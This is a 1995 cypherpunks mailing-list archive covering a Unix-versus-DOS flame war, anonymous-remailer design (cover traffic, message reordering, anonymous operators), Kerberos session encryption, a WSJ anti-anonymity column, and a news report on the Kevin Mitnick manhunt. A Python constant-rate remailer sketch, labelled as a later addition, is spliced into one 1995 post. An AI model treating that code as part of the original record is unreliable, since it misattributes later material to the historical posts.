> [  competitiveness lead us inevitably to the following
> [  mandate for cyberspace:
> [        (1) strong private property rights
> [        (2) infrastructure to be owned by an
> [            unregulated private monopoly
> [        (3) investment to be written off rapidly

Those who remember their history will note that the original Magna Carta was
not a pact that distributed power from a King to the people, but to a feudal
nobility - the rest of us, netSERF on!


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@com.informix.com
Date: Fri, 27 Jan 95 02:25:28 PST
Subject: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <9501271025.AA00392@carbon.informix.com>
MIME-Version: 1.0
Content-Type: text/plain


Todd Masco wrote:
> Do you have any sort of life whatsoever, James?  [....]
> is a total waste of your time,
> esp. if you believe people will read the spew.
> 
> I've simply never heard of anybody caring.

If you don't care then why are you flaming me, instead 
of deleting all the posts which I have clearly labeled 
as being what they are?

As to why it is a vast and voluminous pile of shit, the 
answer is because unix is vast and voluminous,
and I was flamed for failing to give examples 
of how unix is user hostile.

Any report on the defects of unix is necessarily lengthy.

I would send off a letter, and get back to work, then 
immediately unix would bite me again, and I would jump
in and send off another letter.  The letters kept coming
because unix kept biting me.

If I had been working on my PC, which refrains from wantonly
destroying files and presents the most used options near
the top of menus, etc, I would have peaceably ignored
this whole silly issue.  Indeed I would not have been able
to think of a single concrete example of unix user hostility.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Thu, 26 Jan 95 19:56:48 PST
To: cypherpunks@toad.com
Subject: white noise remailer
Message-ID: <199501270356.DAA07394@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


I'm new to all this so please pardon my ignorance, but are you guys
considering the following approach:

The remailer transmits a constant bandwidth of outgoing messages of all
about the same size to a uniformly distributed range of target addresses.
Incoming messages are randomly dispersed within this stream, packed out to
the standard size.

-rkm


---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970
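
The scheme Moore describes, sketched as an added example that is not part of the original post: one fixed-size packet leaves per tick, queued mail is drawn from a pool at random, and empty ticks carry dummies to cover addresses. The slot size, header layout, `p_real` parameter and all addresses are assumptions made for the illustration, and the slots are left unencrypted so the block runs stand-alone.

```python
import random
import secrets
import struct
from collections import namedtuple

SLOT_SIZE = 1024                 # assumed fixed wire size of every outgoing message
# Assumed header: kind (1 = real, 0 = dummy) and payload length. A deployment
# would encrypt the whole slot to the next hop so the kind byte is not visible.
HEADER = struct.Struct(">BH")
Packet = namedtuple("Packet", "tick dest wire")


def pack_slot(payload, real):
    """Pad a payload with random filler so the result is exactly SLOT_SIZE bytes."""
    room = SLOT_SIZE - HEADER.size
    if len(payload) > room:
        raise ValueError("payload of %d bytes exceeds slot capacity %d" % (len(payload), room))
    filler = secrets.token_bytes(room - len(payload))
    return HEADER.pack(1 if real else 0, len(payload)) + payload + filler


def unpack_slot(wire):
    """Return (is_real, payload); reject anything that is not a well-formed slot."""
    if len(wire) != SLOT_SIZE:
        raise ValueError("slot must be exactly %d bytes" % SLOT_SIZE)
    kind, length = HEADER.unpack_from(wire)
    if kind not in (0, 1) or length > SLOT_SIZE - HEADER.size:
        raise ValueError("malformed slot header")
    return kind == 1, wire[HEADER.size:HEADER.size + length]


class WhiteNoiseRemailer:
    """Emits exactly one fixed-size packet per tick, whether or not mail is waiting."""

    def __init__(self, cover_addresses, p_real=0.5, rng=None):
        if not cover_addresses:
            raise ValueError("need at least one cover address for dummy traffic")
        self.cover = list(cover_addresses)
        self.p_real = p_real                  # chance that a tick carries queued mail
        self.rng = rng or random.SystemRandom()
        self.pool = []                        # (dest, padded wire) awaiting a slot
        self.clock = 0

    def submit(self, dest, payload):
        # Pad on arrival so an oversize message is refused before it is queued.
        self.pool.append((dest, pack_slot(payload, real=True)))

    def tick(self):
        self.clock += 1
        if self.pool and self.rng.random() < self.p_real:
            # Random pick from the pool: departure order is unrelated to arrival order.
            dest, wire = self.pool.pop(self.rng.randrange(len(self.pool)))
        else:
            dest, wire = self.rng.choice(self.cover), pack_slot(b"", real=False)
        return Packet(self.clock, dest, wire)


def wire_profile(packets):
    """What a link observer learns from timing and size alone."""
    return [(p.tick, len(p.wire)) for p in packets]


if __name__ == "__main__":
    cover = ["cover%d@example.org" % i for i in range(8)]    # constructed addresses
    busy, idle = WhiteNoiseRemailer(cover), WhiteNoiseRemailer(cover)
    for text in (b"first", b"second", b"third"):              # constructed burst of mail
        busy.submit("bob@example.net", text)
    a = [busy.tick() for _ in range(12)]
    b = [idle.tick() for _ in range(12)]
    print("profiles identical:", wire_profile(a) == wire_profile(b))
    for p in a:
        real, payload = unpack_slot(p.wire)
        print(p.tick, p.dest, "REAL " + payload.decode() if real else "dummy")
```

Timing and size are identical for a busy and an idle remailer, but real mail still goes to its real recipient, so the destination distribution only approaches uniform when cover traffic dominates.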






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Fri, 27 Jan 95 01:06:29 PST
To: cypherpunks@toad.com
Subject: Re: CERT statement
Message-ID: <199501270902.EAA03085@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <9501270023.AA17883@snark.imsi.com>,
Perry E. Metzger <perry@imsi.com> wrote:
>Well, sort of. A key management system that operates sort of like
>Kerberos' is necessary. However, that's really far from
>sufficient. Most Kerberized protocols authenticate only at the
>beginning of the session -- very very hijackable.

I just want to chime in that telnet{,d} clients are available that do
encrypt every packet, built upon Kerberos v5 (and the GSSAPI) for key
management.  There are even libraries that sit on top of sockets with
the same interface and do the encryption (and therefore the implicit
authentication) of every packet.

I'm sure Perry knew this, but I'm also sure others didn't.  I'm afraid
I don't have any pointers at the moment (though I know that they are
in use in some parts of CMU), and unless your need is urgent
and you already use kerberos you should just wait for the new swIPe.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyh9zBNhgovrPB7dAQGk+gP/TatFUjwI79UT1UY5IQK82wlQ/jK7tOXb
HX6zWCVU48l/vfAWHSYdS1QSQEeUMH4Z+lnW4lxW0G9fWDk/LxSlyJqnw/zDEbK+
16ePq/6AWsCCA5Gt2HchAfVoC72iYOeU0oDMQJerr6K6s2FLZrR4vSEQAUSbkoJz
VHLjcR6mrog=
=JYyc
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyi2nSoZzwIn1bdtAQFSiwGAspboooxRv7cVKp3/aPZGVaLkkscfSh/y
PKrOIuBmAoaHmMwUGwV73ygYc3N1bvs0
=PKb8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Fri, 27 Jan 95 01:16:16 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <199501270912.EAA03174@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Do you have any sort of life whatsoever, James?  Writing a gazillion K
of flamage on your hot-button topic du jour, especially when you keep
lying about wanting to end the thread, is a total waste of your time,
esp. if you believe people will read the spew.

(I'm half believing that you're going to call me a collectivist because
 I imply that one writes so that others will read).

I've simply never heard of anybody caring.
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyiAKhNhgovrPB7dAQFRJAQAkGwvDaHc6FbNsZXglVOuH0I6b79MLqaN
cI0rPN2xIwC8w+/cL/jFNaFZDlp4/V1/AZARQaFpY+MMuLsFMBL20c1jAfws/qXO
EVFKEWNlRPDo1D85fxvNwT36J+YsLc+PB5ewWlR6AYysh+QBYzZOUhUXJsAo+Lka
Kn1PAKFDiZM=
=lPZy
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLyi47yoZzwIn1bdtAQFmWwF/UuqPF693wVp6GlI/mkKypPkyyB8thivm
WePmowpndywBGGVhtWiVMcZWzqDGEFo2
=Npk+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 27 Jan 95 02:34:05 PST
To: cypherpunks@toad.com
Subject: Re: Starting a remailer
In-Reply-To: <Zc8AlKJXYPcE078yn@ssnet.com>
Message-ID: <199501271035.FAA03167@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Don Melvin writes:
> Given the goal of limiting remailer liability, what about having
> them be anonymous?  Instead of send you a check, send an unidentified
> money order.  This would even allow ownership to change on a frequent
> basis without the system owner knowing who the current operator is.

Absolutely -- anonymity of the remailer _account holder_ is a central part of 
the "guerrilla remailer" concept AFA I'm concerned. Tim keeps reminding us 
that the distinction between the machine owner/ISP admin and the remailer
operator can be crucial, for legal reasons (i.e. the ECPA). I think it may
also be useful to push this distinction down a level, separating the _account
owner_ from the _remailer operator_. I get the feeling that in many cases the
folks willing/able to fund remailers aren't the same folks who are willing/
able to operate remailers. Hence it seems natural to have a collaboration 
between a remailer sponsor (person or group providing money to pay for an 
account or dedicated hardware) and a remailer operator (person or group 
providing time & technical skill to install, maintain, and upgrade the 
remailer). Of course the sponsor and operator could be anonymous from each
other, and I suppose even the members of each group need not know each 
others' identities.

c2.org allows anonymous account creation over the net, which is handy.
If you're feeling lucky, you could send cash in the mail instead of a money
order....

IMHO the tricky part is maintaining anonymity of the _operator_ over time. In
a reasonably general model, an operator will need to access a remailer
account across the net repeatedly, to recover from system crashes, install
new versions of remailer software, etc. The nature of a telnet session 
doesn't lend itself to reordering, latency, or cover traffic AFAI can see.
Perhaps the technique of sending encrypted shell scripts to an account for
execution (inquired about here recently) could do the work. Anon-HTTP
combined with WWW forms and some not-so-safe-TCL might offer more palatable
real-time responsiveness. I've experimented a little with a protocol for 
handling complaint mail, in which a cron job (or equivalent) running on the
remailer account greps the received non-remailing mail for complaint keywords,
then encrypts the result and chain-remails it to the operator (or posts it to
some well-propagated newsgroup). 

> Thoughts?  Comments?  Offers to send cute girls?

Please cc: me on the latter.  Thanks. ;}

 -L. Futplex McCarthy, seeking a summer job/internship -- private mail for info



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mikepb@freke.lerctr.org (Michael P. Brininstool)
Date: Thu, 26 Jan 95 23:31:22 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270500.AA00284@carbon.informix.com>
Message-ID: <1995Jan26.232513.4993@freke.lerctr.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501270500.AA00284@carbon.informix.com> jamesd@com.informix.com () writes:
>I make myself root, and enter my root password.  I type sync
>three times, and then type reboot. And lo, unix reboots.
>
>Eventually, at long, long, long, long, long, last, Unix
>deigns to come back and give me some windows.
>
>bad sucker -- that will teach me -- maybe next time I will type
>six sync commands before rebooting as a sacrifice to the great
>God unix in the vain hope that it will spare my data.

May I ask why you even bother re-booting?  I never re-boot my machine
unless there is a problem.  I can go for MONTHS without re-booting.  I
have never used a DOS/Windows machine that could go more than a few
days without having to be re-booted.

My machine, if gracefully shutdown, boots in about 2 minutes.  DOS, I
think, would take about 30 seconds.  About 25 seconds of both of those
is POST (Power On Self-Test).

---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool |
| mikepb@freke.lerctr.org      OR      mikepb@netcom.com |
|---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lce@wwa.com (Larry E)
Date: Fri, 27 Jan 95 06:43:06 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270314.AA01417@carbon.informix.com>
Message-ID: <HLGAlG9s1erF075yn@wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9501270314.AA01417@carbon.informix.com>,
jamesd@informix.com (James Donald) wrote:
> 
> If MIS sets up a decent word processor for the secretaries
> in UNIX or Windows, then the secretaries can do moron work
                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> just as easily in either system.  In that sense Perry and
> Bill are perfectly correct.

Ah, yes.  Another knight-on-the-net.  Sorry folks, but I hate it when
the "little people" (other people's view)  are insulted.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Fri, 27 Jan 95 08:54:00 PST
To: perry@imsi.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501271603.AA18804@snark.imsi.com>
Message-ID: <199501271652.IAA15762@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



perry writes:
>james writes:

>   > You can run your program under the debugger and set it so that
>   > when an exception condition occurs, bingo you are in the debugger
>   > at the line where the exception occurred, and all the variables
>   > as they were when the exception occurred, and the rest of windows,
>   > the graphical user interface, has been frozen until you examine 
>   > the situation to your satisfaction.

>   > Try that in Unix.

>   I've been doing it all morning, but then again, I'm just on drugs.

perry! and you didn't share?

josh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Douceur <johndo@microsoft.com>
Date: Fri, 27 Jan 95 09:45:54 PST
To: cypherpunks@toad.com
Subject: RE: Get ready to start breaking rocks for Herr Klinton
Message-ID: <9501271746.AA27857@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: Sandy Sandfort  <sandfort@crl.com>
....

>With his arms control policy background and current familiarity
>with crypto as non-exportable munition, Phil Zimmermann is a
>shoo-in for a seat on the president's Arms Proliferation Board.
>Hell, he ought to be the Chairperson!

This may have been intended tongue-in-cheek, but I think this is an 
excellent idea.  Think Phil would be interested in the position?  How 
could we get this going?

JD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Fri, 27 Jan 95 00:51:39 PST
To: cypherpunks@toad.com
Subject: Re: Reordering, not Latency (Was: Re: Remailer)
Message-ID: <199501270851.AA19809@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 25 Jan 1995 Michael Handler wrote:
>On Wed, 25 Jan 1995 Louis Cypher wrote:
>
>> In recent discussions, the consensus
>> was that message reordering was superior to (and the actual intent of)
>> latency.  Reordering is not sufficient, a form of latency is required
>> to make it effective.
>
>        I have literally hundreds of messages archived from the CP list of
>several months back where Eric Hughes repeatedly states that reordering,
>not latency, is the key. Reordering of a sufficient magnitude will
>introduce latency inherently. Otherwise you are still vulnerable to
>traffic analysis (which is an art, not a science, remember).
>
>--
>Michael Handler <grendel@netaxs.com>

If you read my analysis with more care, you will note that I do not argue
that latency is superior to reordering, nor that it should be used in place
of reordering.  Reordering is far superior to latency. My point is that pure
reordering is vulnerable to attack. It is less vulnerable if combined with
latency.

Also note that this was a repost of a message I sent to the list some
months ago. I sent it because it seemed similar to the work that Wei Dai
has been posting.


        -Louis Cypher

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLyiy0qyHUAO76TvRAQF6qAQAk6IDl+UknPQ+c6hbmPvlgCtF2xwG0KZ3
aUXiuv/XJ5e5prRwLQ4X6rOUSflT2f+mRPO4fveVmWePWcr8BtV6LUQM+qJOLe5k
Ay7CD+OGN9ni9EhRbIg3Sgdv6yB8cX2CpdMSByFD8J9rM240UWqSt/DgNQIlkTtC
Jx+0NQP80QA=
=aKOE
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 27 Jan 95 10:24:04 PST
To: cypherpunks@toad.com
Subject: Re:  Mixmaster and remailers
Message-ID: <199501271823.KAA19858@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
> Even if you are using a perfect network of remailers, you can still be
> tracked. Only so many messages pass through the network of remailers in any
> given day. If Alice sending a message usually correlates with Bob receiving
> a message, it is likely that she is sending messages to him. This was
> discussed in some detail in several messages by Hal and Louis Cypher.

Actually I don't think I considered this aspect of the problem.  Probably
you are thinking of Wei Dai's posts along with LC's.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 07:41:42 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270505.AA00287@carbon.informix.com>
Message-ID: <9501271541.AA18730@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com says:
> And did I mention that "make" used to treat a tab as semantically
> different from a space, so that a tab with an invisible space
> in front of it would result in the makefile failing.
> 
> Oh yes, I did mention that.

Did I mention that DOS used to make you use EDLIN out of the box?

I strongly suspect, James, that you don't understand how to evaluate
an operating system. You make bizarre, insane claims that NT is
somehow more secure than Unix (???), that Unix is somehow harder to
use than DOS, that X is harder to use than Windows (sure, if you
compare the worst Unix editor against the best Windows has I'm sure
you can come up with some vague ammunition. I can play that game too
-- compare FrameMaker against Notepad.)

Luckily, the market has given most of us the best revenge on you,
James -- the Unix world isn't desperately trying to catch up with
MS-DOG.

I'm reminded of a recent instance in which a client and I had to
install an entire trading floor full of Sun workstations -- since we
had decent tools, the task took about two hours, give or take. The PC
ignorami, who make fun of Unix all the time, had a PC on each desk,
too. Their team of about 15 people couldn't finish the task in four days.

But I'm not going to continue this any further. James isn't equipped
to conduct the conversation.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 07:43:47 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270512.AA00309@carbon.informix.com>
Message-ID: <9501271543.AA18738@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com says:
> And did I mention that in DOS you can type 
>    rename *.txt *.asc
> to turn all *.txt files into the corresponding *.asc file
> 
> but that if in unix you type
>    mv *.txt *.asc
> not only will it not rename your *.txt files to be *.asc files, but
> if you have only two *.txt files it will silently destroy the
> second and issue no warning that anything has gone amiss.

In Unix, I can use a single command to delete an entire file tree --
rm -r. In DOS, I have to delete each directory by hand.

This isn't how you evaluate these things, James.

> And of course I have already mentioned the unix "make" utility.

DOS doesn't even have a make utility -- perhaps you should do without
using make ever again, as DOS is obviously superior.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 08:03:27 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
In-Reply-To: <9501270629.AA00372@carbon.informix.com>
Message-ID: <9501271603.AA18804@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com says:
> And another vast advantage of DOS Windows is that it is 
> a vastly better environment for developing software than unix.
> 
> The great strength is of course symbolic debugging -- you can
> single step your compiled code, and see it displayed symbolically,
> with the symbols and statements of your source code, whilst
> unix programmers are usually reduced to picking through core 
> dumps like grave robbers.

Strange -- I've had symbolic debuggers and execution environments on
Unix since I started using it in the early 1980s. I guess I've just
been hallucinating. Or perhaps James is.

> You can run your program under the debugger and set it so that
> when an exception condition occurs, bingo you are in the debugger
> at the line where the exception occurred, and all the variables
> as they were when the exception occurred, and the rest of windows,
> the graphical user interface, has been frozen until you examine 
> the situation to your satisfaction.
> 
> Try that in Unix.

I've been doing it all morning, but then again, I'm just on drugs.

> You might be able to do a crude and limited equivalent with 
> a text mode program, but with a GUI program you are hosed.

Actually, I've been doing it on a large GUI application.

> This is the basic reason why unix software sucks -- because the
> tools for writing it suck.

Fascinating.

> And windows has the *.rc file system for internationalization.

I guess that the Posix internationalization system is another
hallucination of mine.

James, you are an ignoramus.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 27 Jan 95 09:18:58 PST
To: cypherpunks@toad.com
Subject: Re: "Subway" remailers
Message-ID: <9501271718.AA10027@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


maher@kauai.UCSD.EDU (Kevin E. Maher) writes:
>        I think what you've described is essentially a "secondary"
>remailer, one which only communicates with other remailers in messages
>of a fixed size.  I'm pretty sure mixmaster can do this, and additionally
>can split a message into chunks and send them on their way via different
>paths.
>
>        If I've misinterpreted what you were describing, please correct me.

Hmmm...  think of an egg carton, filled with anywhere between zero and
twelve eggs. Each egg has its own itinerary as to how many stops it
wants to make at other remailers, and whether it wants to change
cartons. The eggs would be entire messages, and could "get off" at
any particular stop, or at a random stop (based on # of rides(hops?)).
The entire carton would be encrypted from one stop to the next.

I would anticipate that the single-message architecture of the cpunk
remailer would be retained, and that "riding the subway" would be an
optional feature. Of course with "passenger" exchange and waiting
you essentially get the mixmaster effect, except you are blind to
the actual pathway. (remember the MX-missile system, which planned on
moving ICBMs from launch site to launch site in an underground matrix
of tunnels?) The only thing you would see from the outside is regular
pulses of large cargo-carrying (or not) message containers. It might
be a partial cover-traffic solution as well, though you still have to
worry about entering and exiting the subway system, it's just that it
somewhat breaks the identifiable direct traffic-trace links.

An even more advanced feature could allow an individual to submit
an entire container (loaded with different messages) to the subway
system (although this may give an attacker clues about any weakness
in randomizing pathways internal to the system, for users utilizing
default features). Imagine only submitting one or two messages a
day that delivered twenty-five. That might really furrow a traffic
analyst's brow. More or less that extends the subway paradigm
outside the ring of the system, at least partially, I would guess.

I am unsure if there is an existing term for this, but how about
"composite mail" containing "aggregate messages"?

------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Fri, 27 Jan 95 11:40:33 PST
To: cypherpunks@toad.com
Subject: Wall Street Journal Article
Message-ID: <199501271939.LAA14460@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This may have been mentioned, if so please ignore.  

There was an interesting article in Thursday's Wall Street 
Journal calling for the end of anonymous communications on the Internet.
It is on page B1 under the "Personal Technology" column and was written 
by Walter Mossberg (mossberg@wsj.com) who invites comment.  

Just a couple of quotes: 

"When forums operate under the cloak of anonymity, it's no different 
from printing a newspaper in which the bylines are admittedly fake, and 
the letters to the editor are untraceable." 

and 

"It <anonymous communications> makes it easier to spread wild conspiracy 
theories, smear people, conduct financial scams or victimize others 
sexually."

He goes on to discuss the other two BIG problems on the Internet, those 
being "Incivility" (flaming for breach of netiquette) and "Censorship" 
(cancelling of spams).


Dale H.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 27 Jan 95 09:54:01 PST
To: cypherpunks@toad.com
Subject: Re: "Subway" remailers
Message-ID: <9501271753.AA10408@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



 maher@kauai.UCSD.EDU (Kevin E. Maher) writes:
>        I think what you've described is essentially a "secondary"
>remailer, one which only communicates with other remailers in messages
>of a fixed size.  I'm pretty sure mixmaster can do this, and additionally
>can split a message into chunks and send them on their way via different
>paths.
>
>        If I've misinterpreted what you were describing, please correct me.

Hmmm...  think of an egg carton, filled with anywhere between zero and
twelve eggs. Each egg has its own itinerary as to how many stops it
wants to make at other remailers, and whether it wants to change
cartons. The eggs would be entire messages, and could "get off" at
any particular stop, or at a random stop (based on # of rides(hops?)).
The entire carton would be encrypted from one stop to the next.

I would anticipate that the single-message architecture of the cpunk
remailer would be retained, and that "riding the subway" would be an
optional feature. Of course with "passenger" exchange and waiting
you essentially get the mixmaster effect, except you are blind to
the actual pathway. (remember the MX-missile system, which planned on
moving ICBMs from launch site to launch site in an underground matrix
of tunnels?) The only thing you would see from the outside is regular
pulses of large cargo-carrying (or not) message containers. It might
be a partial cover-traffic solution as well, though you still have to
worry about entering and exiting the subway system, it's just that it
somewhat breaks the identifiable direct traffic-trace links.

An even more advanced feature could allow an individual to submit
an entire container (loaded with different messages) to the subway
system (although this may give an attacker clues about any weakness
in randomizing pathways internal to the system, for users utilizing
default features). Imagine only submitting one or two messages a
day that delivered twenty-five. That might really furrow a traffic
analyst's brow. More or less that extends the subway paradigm
outside the ring of the system, at least partially, I would guess.

I am unsure if there is an existing term for this, but how about
"composite mail" containing "aggregate messages"?

------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Jan 95 10:24:39 PST
To: cypherpunks@toad.com
Subject: RE: Get ready to start breaking rocks for Herr Klinton
Message-ID: <199501271824.NAA04461@pipe4.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 95 John Douceur <johndo@microsoft.com> said: 
 
 
>This may have been intended tongue-in-cheek, but I think this is an  
>excellent idea.  Think Phil would be interested in the position?  How  
>could we get this going? 
 
 
 
One well-travelled path to success is through the Foreign Policy
Association, and being published in the journal "Foreign Affairs".  Many of
the wonks climbed this greasy pole -- Kissinger et al. 
 
 
Thus, an article on cryptography, PGP and its beneficial use for -- or
threat to -- foreign policy and arms control might be sent to the
publisher: 
 
 
     James Hoge, Editor 
     Foreign Affairs 
     58 East 68th Street 
     New York, NY 10021 
     (212) 734-0400 
 
 
The Foreign Policy Association runs seminars, junkets, fellowships,
retreats, advances, and cartels for aspiring and decrepit world leaders and
public opinion spew-gushers.  So perhaps there might be receptivity to a
seminar on PGP and public crypto for the high-domed dim-bulbs. 
 
 
     Foreign Policy Association 
     729 7th Avenue, 8th Floor 
     New York, NY 10019 
     (212) 764-4050 
 
 
Then, there's the Carnegie stable of world meddlers which sponsors fledging
and sinewy American eagles and vultures: 
 
 
     Carnegie Council on Ethics and International Affairs, 170 East 64th
St, NY, NY 10021. 
 
     Carnegie Leadership Program, 170 East 64th St, NY, NY 10021 
 
     Carnegie Commission on Science, Technology & Government, 437 Madison,
NY, NY 10021. 
 
     Carnegie Foundation, 437 Madison Avenue, NY, NY 10021 (the main honey
pot). 
 
     Carnegie Foundation for World Something in DC. 
 
 
These and a cackling aviary in VA black-farms are the roosts of the big
arms poachers and clip-wingers. 
 
 
Golly, must dear tender Phil hang with these peckerwoods? 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Fri, 27 Jan 95 06:36:02 PST
To: cypherpunks@toad.com
Subject: hacker search
Message-ID: <9501271329.AA26776@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



US Marshals On Trail Of Hacker
WASHINGTON, D.C., U.S.A., 1995 JAN 26 (NB) -- The US Marshals Service is on
the trail of a computer hacker who disappeared after being convicted of one
electronic crime and charged with another.

Authorities say they are trying to locate Kevin David Mitnick, 31, originally
from Sepulveda, California.

Deputy US Marshal Kathleen Cunningham told Newsbytes the Marshals Service has
had a probation violation warrant for Mitnick since November 1992, and almost
caught up with him in Seattle last October.

Cunningham said Mitnick is a ham radio enthusiast and is believed to use a
scanner to keep track of police in the area where he is hiding. "(Local
police) didn't use radio security so as soon as his address was mentioned he
was out of there. He just left everything."

Cunningham said authorities were able to get quite a bit of information about
Mitnick from the things he abandoned when he fled the Seattle location.

Mitnick is considered an expert at gaining control of computers to monitor or
use communications systems and knows how to manufacture false identities
using computers.

While still a teenager Mitnick was charged with "cracking" the North American
Air Defense Command computer and of using a modem to control telephone
switching centers in New York and California. A story last summer in The New
York Times reported Mitnick listened in on phone calls and reprogrammed the
home telephone of one individual so that each time the phone was picked up a
recording asked the phone user to deposit 25 cents.

Mitnick was charged with electronically stealing $1 million in secure
software from Digital Equipment Corp. causing the company to spend $160,000
to close up the gaps in its computer security. Upon conviction in that case
Mitnick was placed on supervisory probation in 1992. He disappeared later
that year after he was charged with illegally cracking into Pacific Bell's
computers. He is also reportedly a suspect in an incident in which someone
illegally accessed the computer at Britain's Loughborough University.

An information sheet about Mitnick says that, although he is not considered a
dangerous criminal, his activities are costing millions of dollars in the
public and private sectors. "Sensitive information illegally accessed by
Mitnick would cause continued financial hardship to these various
corporations if the information is ever disseminated to others."

The document warns authorities who might come in contact with Mitnick to be
very cautious about letting him get his hands on any personal information about
officers. "He possesses an amazing ability to disrupt one's personal life
